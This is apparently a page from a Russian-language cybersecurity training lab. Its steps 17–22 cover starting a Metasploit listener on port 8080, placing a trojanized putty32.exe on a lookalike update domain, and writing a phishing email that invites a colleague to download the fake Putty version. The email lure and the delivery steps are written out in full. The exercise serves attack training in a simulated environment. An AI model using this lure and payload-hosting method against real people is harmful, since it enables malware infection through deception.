<div class="me-3" class="me-3 module-1-page-4">

	  <h5 class="card-title custom-title-for-change"><b>17. Вооружение </b> - <i>проверка настроек</i></h5>
	  <div class="inova-custom-border">
			<p class="ms-3">На этом все необходимые шаги по настройке завершены. Теперь давайте проверим правильность всех настроек, выполнив команду:</p>
			<div class="ms-3 me-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="show options" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">show options</small></kbd></div>
			<p class="ms-3 mt-3">Из-за размера и длины вывода вам придется немного прокрутить (или увеличить размер окна терминала), но эта команда должна вернуть следующие значения:</p>
			<div class="d-flex justify-content-center">	
				<pre><code><b>LHOST: </b>10.10.10.15</code><br><code><b>LPORT:</b> 8080</code></pre>
			</div>
	  </div>
	  <hr>
	  <img class="img-fluid" src="/assets/img/modules/1/ex-1-ss-17.png">
	  <hr>
	
	  <h5 class="card-title custom-title-for-change"><b>18. Вооружение </b> - <i>запуск эксплойта</i></h5>
	  <div class="inova-custom-border">
			<p class="ms-3">После того, как вы проверили все параметры, мы можем запустить команду <kbd class="inova-custom-kbd">«exploit»</kbd> в Metasploit, которая запустит нашу атаку:</p>
			<div class="ms-3 me-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="exploit" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">exploit</small></kbd></div>
			<p class="ms-3 mt-3">В результате нашей конфигурации Metasploit теперь начнет прослушивать соединение на порту 8080 <span class="text-danger" style="white-space: nowrap">(Не закрывайте это окно!)</span>.</p>
	  </div>
	  <hr>
	  <img class="img-fluid" src="/assets/img/modules/1/ex-1-ss-18.png">
	  <hr>
  
    
	  
	  <h5 class="card-title custom-title-for-change"><b>19. Доставка нагрузки</b> - <i>размещение нашей полезной нагрузки</i></h5>
	  <div class="inova-custom-border">
			<p class="ms-3">Готовясь к этой атаке, злоумышленник просмотрел Интернет на предмет доступных доменных имен, связанных с <b>KAZLABS</b>. Одно из доменных имен, которое все еще было доступно, было <b style="white-space:nowrap">www.kazlabs-updates.kz</b>!</p>
			<p class="ms-3"> Он зарегистрировал доменное имя и указал DNS-запись на свою машину Kali! Когда вы перейдете на сайт <b>www.kazlabs-updates.kz</b>, вы увидите конфигурацию Apache2 по умолчанию.</p>
			<p class="ms-3">Давайте использовать этот домен для размещения нашей вредоносной нагрузки.</p>
			<p class="ms-3"></p>
			<p class="ms-3"></p>
	  </div>
	  <hr>
	  
	  <h5 class="card-title custom-title-for-change"><b>20. Доставка</b> - <i>перемещение полезной нагрузки в веб-корень</i> </h5>
	  <div class="inova-custom-border">
			<p class="ms-3">Давайте переместим нашу полезную нагрузку Putty32.exe в корневой каталог, где мы сможем предоставить ее пользователям Интернета. Для этого введите следующую команду терминала:</p>
			<div class="ms-3 me-3 mt-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="mv /home/student/Desktop/putty32.exe /var/www/html/putty32.exe" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">mv /home/student/Desktop/putty32.exe /var/www/html/putty32.exe</small></kbd></div>
	  </div>
	  <hr>
	  <img class="img-fluid" src="/assets/img/modules/1/ex-1-ss-19.png">
	  <hr>
	  

	<!-- End Default Card -->
  
    <!-- Default Card -->

      <h5 class="card-title custom-title-for-change"><b>21. Доставка</b> - <i>создание электронного письма для фишинга</i></h5>
      <div class="inova-custom-border">
			<p class="ms-3">Вернитесь в окно <b>«STC - Webmail»</b>, где теперь мы можем создавать фишинговые письма.</p>
	  </div>
	  <hr>
	  
	  <h5 class="card-title custom-title-for-change"><b>22. Доставка</b> - <i>отправка фишингового письма</i></h5>
	  <div class="inova-custom-border">
			<p class="ms-3">Напишем письмо со следующим содержанием:</p>
			<div class="d-flex justify-content-center">	
				<pre><code>Subject: Новая Версия Putty!</code><br><code>Приветствую, Дуайт!</code><br><code>Вышла новая версия Putty. Появились очень удобные фишки.</code><br><code>Рекомендую. Можешь скачать здесь: <u>http://www.kazlabs-updates.kz</u></code></pre>
			</div>
			<p class="ms-3">По завершении нажмите кнопку <b>«Send»</b> (в правом верхнем углу экрана).</p>
	  </div>
	  <hr>
    <!-- End Default Card -->
</div>